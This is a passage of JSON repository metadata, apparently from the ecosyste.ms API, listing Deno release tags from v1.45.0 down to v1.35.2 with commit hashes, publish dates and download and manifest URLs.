ublished_at":"2024-07-10T22:08:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0/manifests"},{"name":"v1.44.4","sha":"892e7c20ac6e7bc0601f4c23e64f43187c1b8479","kind":"commit","published_at":"2024-06-19T16:28:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4/manifests"},{"name":"v1.44.3","sha":"ab2ab0f7fc4e7bda16544ef96a5e6ba114e799b5","kind":"commit","published_at":"2024-06-19T00:19:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3/manifests"},{"name":"v1.44.2","sha":"9ca1320746072001feab9f6a26e9c1518609bd7b","kind":"commit","published_at":"2024-06-13T00:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2/manifests"},{"name":"v1.44.1","sha":"e02a32be2797f7c107d19da8bf2aff5bbcd97bad","kind":"commit","published_at":"2024-06-05T23:05:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1/manifests"},{"name":"v1.44.0","sha":"f3ffffc682604349b96dbe4ad33daa5dd1a09f63","kind":"commit","published_at":"2024-05-30T05:58:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0/manifests"},{"name":"v1.43.6","sha":"7df3d5aeec14f24e5fdec1e1e6f5739f1fbeebbe","kind":"commit","published_at":"2024-05-21T23:34:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6/manifests"},{"name":"v1.43.5","sha":"a13c4531fd2c08617767cc8a0788b9e20ac27d45","kind":"commit","published_at":"2024-05-18T00:22:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5/manifests"},{"name":"v1.43.4","sha":"d64921c1906ee1ac39230c16abe9ff8c546bd645","kind":"commit","published_at":"2024-05-16T23:28:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4/manifests"},{"name":"v1.43.3","sha":"d6ad253882a6c066e0c673ff64e6554a37bb3487","kind":"commit","published_at":"2024-05-10T20:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3/manifests"},{"name":"v1.43.2","sha":"acd75bbd75fdf46c213d7b21093e09349318da5d","kind":"commit","published_at":"2024-05-08T22:21:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2/manifests"},{"name":"v1.43.1","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1/manifests"},{"name":"v1.43.0","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0/manifests"},{"name":"v1.42.4","sha":"7cb23c5e3ee0b6c416f4c0e34c7c63fdf5024138","kind":"commit","published_at":"2024-04-16T00:17:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4/manifests"},{"name":"v1.42.3","sha":"a64a257024c9933d90494613ac6b302cc69df6fa","kind":"commit","published_at":"2024-04-12T00:54:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3/manifests"},{"name":"v1.42.2","sha":"04c0a4cbf7c00811d3ace3184c1cb8597a0e88f1","kind":"commit","published_at":"2024-04-11T06:39:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2/manifests"},{"name":"v1.42.1","sha":"08f0613b390b289d07c6ea165bed0518809b34e8","kind":"commit","published_at":"2024-04-01T06:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1/manifests"},{"name":"v1.42.0","sha":"9c6eca1064de029e560377bef831e69d22c5c00b","kind":"commit","published_at":"2024-03-28T00:47:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0/manifests"},{"name":"v1.41.3","sha":"0d7662e1556a60bcc4b7075752fb2c2842b1afea","kind":"commit","published_at":"2024-03-14T18:13:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3/manifests"},{"name":"v1.41.2","sha":"6d062cf0c79158a8c0c8a136c945c3eab2af8b50","kind":"commit","published_at":"2024-03-08T07:32:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2/manifests"},{"name":"v1.41.1","sha":"8ccb9e954548d1a4d3ccbe065c28d6067d3fda03","kind":"commit","published_at":"2024-03-01T00:25:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1/manifests"},{"name":"v1.41.0","sha":"118445103b019fbeb50eadc8d09d450fa8c33eee","kind":"commit","published_at":"2024-02-22T01:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0/manifests"},{"name":"v1.40.5","sha":"2c97831fec0d335a474c4a599a5df345a23ef036","kind":"commit","published_at":"2024-02-15T05:22:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5/manifests"},{"name":"v1.40.4","sha":"49214d309fc373a80a02f57545131b15f7813a98","kind":"commit","published_at":"2024-02-08T11:05:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4/manifests"},{"name":"v1.40.3","sha":"887fd59486325ad99c183955b35fec07fd45516c","kind":"commit","published_at":"2024-02-01T06:27:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3/manifests"},{"name":"v1.40.2","sha":"9a55a72cf195b2d5cee1e8598c7d28e4b1e8013a","kind":"commit","published_at":"2024-01-26T16:36:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2/manifests"},{"name":"v1.40.1","sha":"b003ecec64782ebe3aa7e5b17728df2e6a6e2e39","kind":"commit","published_at":"2024-01-25T15:22:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1/manifests"},{"name":"v1.40.0","sha":"9e575a286269c38c1af0a918a2a4ea4639a3004b","kind":"commit","published_at":"2024-01-25T02:48:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0/manifests"},{"name":"v1.39.4","sha":"be4d0b7ad306312b0c01e1abc345e54b4e589ab6","kind":"commit","published_at":"2024-01-13T23:52:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4/manifests"},{"name":"v1.39.3","sha":"aa23ccd1ae3b0c188336c0fd1d84deaed5fe13af","kind":"commit","published_at":"2024-01-12T14:58:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3/manifests"},{"name":"v1.39.2","sha":"6af25c0592af46781b63bd43cf12d39b8aa61d09","kind":"commit","published_at":"2024-01-04T20:40:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2/manifests"},{"name":"v1.39.1","sha":"68254ddc2060c32e6daa55aa3b33f82739655705","kind":"commit","published_at":"2023-12-21T15:46:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1/manifests"},{"name":"v1.39.0","sha":"5b96f7bf21392620f0047687ec3b75b25b7ea9f2","kind":"commit","published_at":"2023-12-13T21:52:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0/manifests"},{"name":"v1.38.5","sha":"172e5f0a0cea97ba27f7f6e46fb8f9b31f8dbbc6","kind":"commit","published_at":"2023-12-05T22:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5/manifests"},{"name":"v1.38.4","sha":"8c07f52a7cbd6117e968383c94fe25b91c4c9242","kind":"commit","published_at":"2023-11-30T19:12:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4/manifests"},{"name":"v1.38.3","sha":"3193e93912f87dd05871abb61f54297368f3f265","kind":"commit","published_at":"2023-11-24T03:49:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3/manifests"},{"name":"v1.38.2","sha":"118be11e8c64fd6c4afb352b5095c02fa5571e8e","kind":"commit","published_at":"2023-11-17T05:57:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2/manifests"},{"name":"v1.38.1","sha":"0e7ad0388be7413db6ded8b60d5ae5d7cc0ffda0","kind":"commit","published_at":"2023-11-10T11:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1/manifests"},{"name":"v1.38.0","sha":"41877a0b3735d52db8b4f5047b1d4d61e37ba585","kind":"commit","published_at":"2023-11-02T01:01:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0/manifests"},{"name":"v1.37.2","sha":"7282994df4f9c1748affa7c4455eea46a9e1a2e0","kind":"commit","published_at":"2023-10-13T00:14:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2/manifests"},{"name":"v1.37.1","sha":"72c276d61a8b43abd3dbcf4f1440a2bf133fe0d2","kind":"commit","published_at":"2023-09-27T06:24:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1/manifests"},{"name":"v1.37.0","sha":"997aa604dfd50c0f0ec6fd4db16b5034d2cfd726","kind":"commit","published_at":"2023-09-19T20:29:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0/manifests"},{"name":"v1.36.4","sha":"c0617d11f6391f1b1b3afffe0152c73b5989ab80","kind":"commit","published_at":"2023-09-01T14:15:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4/manifests"},{"name":"v1.36.3","sha":"55029c72618323014aa49317de9124375adeb13f","kind":"commit","published_at":"2023-08-24T16:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3/manifests"},{"name":"v1.36.2","sha":"a7f5244a72cc6c00949c02a180d0d9cdf2bf1672","kind":"commit","published_at":"2023-08-21T13:39:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2/manifests"},{"name":"v1.36.1","sha":"9f1455b75087e9e41a995bbb6a8a7f3059a0185a","kind":"commit","published_at":"2023-08-10T10:53:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1/manifests"},{"name":"v1.36.0","sha":"6ba245fe2570b29e35a4fd296a196a58870b1e3c","kind":"commit","published_at":"2023-08-03T16:26:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0/manifests"},{"name":"v1.35.3","sha":"2e7254f2a60239603a2c6fea75cc71fbf6226470","kind":"commit","published_at":"2023-07-26T14:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3/manifests"},{"name":"v1.35.2","sha":"60fe8aa5325345fc07c997b2dba169e45b87a863","kind":"commit","published_at":"2023-07-20T01:29:23.000